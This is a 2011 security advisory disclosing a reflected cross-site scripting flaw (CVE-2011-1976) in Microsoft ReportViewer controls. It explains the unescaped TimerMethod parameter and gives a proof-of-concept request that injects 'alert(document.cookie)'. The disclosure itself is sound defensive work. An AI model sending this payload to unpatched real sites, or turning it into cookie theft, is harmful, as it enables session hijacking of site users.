==================================================
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls
Adam Bixby - Gotham Digital Science (l...@gdssecurity.com)
Public Release Date: 8/9/2011
Confirmed Affected Software: Microsoft Report Viewer Redistributable 2005 SP1
and Microsoft Visual Studio 2005 Service Pack 1
Browser used for testing: IE8 (8.0.7601.17514)
Severity: High
MS Bulletin: MS11-067 -
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
CVE: CVE-2011-1976
==================================================
1. Summary
==================================================
The Microsoft ReportViewer Controls are a freely redistributable control that
enables embedding reports in applications developed using the .NET Framework.
A Cross-Site Scripting (XSS) vulnerability was found in the
Microsoft.ReportViewer.WebForms.dll. The XSS vulnerability appears to affect
all websites that utilize the affected controls.
==================================================
2. Technical Details
==================================================
File: Microsoft.ReportViewer.WebForms.dll (PerformOperation() method of the
SessionKeepAliveOperation class)
1) User controllable data enters via the "TimerMethod" URL parameter value and
is assigned to the "andEnsureParam" string variable.
string andEnsureParam = HandlerOperation.GetAndEnsureParam(urlQuery,
"TimerMethod");
2) The "andEnsureParam" variable with user-controllable input is then passed
into the "s" string variable which is dynamically building a javascript block.
The "s" variable is then passed to response.write(). Writing the un-validated
data to the JS block creates the XSS exposure.
string s = string.Format(CultureInfo.InvariantCulture,
"<html><body><script
type=\"text/javascript\">parent.{0}();</script></body></html>",
new object[] { andEnsureParam });
response.Write(s);
==================================================
3. Proof-of-Concept Exploit
==================================================
This vulnerability can be exploited against websites that have deployed the
vulnerable Microsoft.ReportViewer.WebForms.dll. You will note that since the
data is being written into an existing Javascript block that the attacker does
not need to include any opening or closing tags (i.e.,<img>, <script>, etc) to
execute code.
Reproduction Request:
https://test.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=<arbitraryIDvalue>&ControlID=<validControlID>&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=
(Note: During testing of this issue, it appeard as though a valid ControlID
parameter value was needed to exploit this issue)
==================================================
4. Recommendation
==================================================
Update to the latest versions. For more information please see
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
==================================================
5. About Gotham Digital Science
==================================================
Gotham Digital Science (GDS) is an information security consulting firm that
works with clients to identify, prevent, and manage security risks. For more
information on GDS, please contact i...@gdssecurity.com or visit
http://www.gdssecurity.com.
